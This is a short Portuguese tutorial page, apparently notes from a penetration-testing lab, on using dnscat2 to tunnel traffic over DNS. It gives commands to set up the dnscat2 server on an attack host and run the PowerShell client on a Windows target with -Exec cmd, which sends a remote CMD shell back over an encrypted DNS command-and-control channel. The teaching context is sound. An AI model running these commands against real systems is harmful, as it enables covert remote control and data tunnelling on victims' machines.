Dnscat2

Dnscat2 é uma ferramenta de tunelamento que usa o protocolo DNS para enviar dados entre dois hosts. Ele usa um canal criptografado Command-&-Control( C&Cou C2) e envia dados dentro de registros TXT dentro do protocolo DNS.

  • Clonando dnscat2 e configurando o servidor

git clone https://github.com/iagox86/dnscat2.git
  • Iniciando o servidor dnscat2

sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
  • Após executar o servidor, ele nos fornecerá a chave secreta, que teremos que fornecer ao nosso cliente dnscat2 no host do Windows para que ele possa autenticar e criptografar os dados que são enviados ao nosso servidor dnscat2 externo.

  • Clonando dnscat2-powershell para o Host de Ataque

git clone https://github.com/lukebaggett/dnscat2-powershell.git
  • Quando o dnscat2.ps1arquivo estiver no destino, podemos importá-lo e executar os cmd-lets associados.

Import-Module .\dnscat2.ps1
  • Depois que dnscat2.ps1 for importado, podemos usá-lo para estabelecer um túnel com o servidor em execução em nosso host de ataque. Podemos enviar de volta uma sessão de shell CMD para nosso servidor.

Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd 
  • Podemos listar as opções que temos com dnscat2 digitando ?no prompt.

  • Interagindo com a Sessão Estabelecida

dnscat2> window -i 1

Last updated